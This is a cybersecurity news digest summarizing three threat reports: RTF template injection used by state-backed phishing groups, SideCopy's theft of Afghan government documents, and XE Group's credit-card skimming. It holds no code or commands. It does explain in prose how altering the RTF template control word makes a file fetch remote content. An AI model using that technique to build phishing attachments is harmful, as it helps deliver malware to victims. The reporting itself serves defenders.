At a glance.
- RTF template injection used by nation-state actors.
- SideCopy targets South Asia.
- XE Group skims credit cards.
RTF template injection used by nation-state actors.
Researchers at Proofpoint have observed "the adoption of a novel and easily implemented phishing attachment technique by APT threat actors in Q2 and Q3 of 2021." The technique, called RTF template injection, is being used by several state-sponsored threat actors associated with China, India, and Russia:
"RTF template injection is a simple technique in which an RTF file containing decoy content can be altered to allow for the retrieval of content hosted at an external URL upon opening an RTF file. By altering an RTF file’s document formatting properties, specifically the document formatting control word for “\*\template” structure, actors can weaponize an RTF file to retrieve remote content by specifying a URL resource instead of an accessible file resource destination. RTF files include their document formatting properties as plaintext strings within the bytes of the file. This allows the property control word syntax to be referenced even in the absence of a word processor application, providing formatting stability for the filetype across numerous platforms. However, RTF files based on the malleability of these plaintext strings within the bytes of a file are often subverted for malicious file delivery purposes in the context of a phishing campaign. While historically the use of embedded malicious RTF objects has been well documented as a method for delivering malware files using RTFs, this new technique is more simplistic and, in some ways, a more effective method for remote payload delivery than previously documented techniques."
The researchers conclude that “based on the recent rise in its usage and the triviality of its implementation, [the technique] could soon be adopted by cybercriminals as well.”
SideCopy targets South Asia.
Malwarebytes has provided more details on a cyberespionage campaign run by SideCopy, a Pakistan-aligned threat actor that’s targeting countries in South Asia, particularly Afghanistan and India:
"The SideCopy APT was able to steal several Office documents and databases associated with the Government of Afghanistan. As an example, the threat actor exfiltrated Diplomatic Visa and Diplomatic ID cards from the Ministry of Foreign Affairs of Afghanistan database, as well as the Asset Registration and Verification Authority database belonging to the General Director of Administrative Affairs of Government of Afghanistan. They also were able to exfiltrate the ID cards of several Afghani government officials....The exfiltrated documents contain names, numbers and email addresses associated with government officials. It is possible that they have been already targeted by the actor or will be the future targets of this actor. There are also some confidential letters that we think the actor is planning to use for future lures."
XE Group skims credit cards.
Volexity has published a report on a criminal threat actor dubbed "XE Group," suspected to be operating from Vietnam. XE Group is focused on credit card skimming by compromising legitimate websites:
“There is a relatively clear trail of evidence to help identify XE Group. The attacker appears to be of Vietnamese origin. They often use the brand ‘XE Group,’ and a number of ‘xe[word]’ themed domains have been registered and linked to the group. Volexity has identified a likely persona on carding forums associated with this activity, which suggests the attacker monetizes stolen credit card data through sales rather than direct use of stolen cards themselves. The persona used for the GitHub and carding account, and several of the domains, have a history going back to 2013, which suggests the attacker may have been attempting similar attacks for up to eight years, with only one significant public mention of their activity. The oldest malware sample Volexity was able to identify relating to XE Group dates back to late 2014.”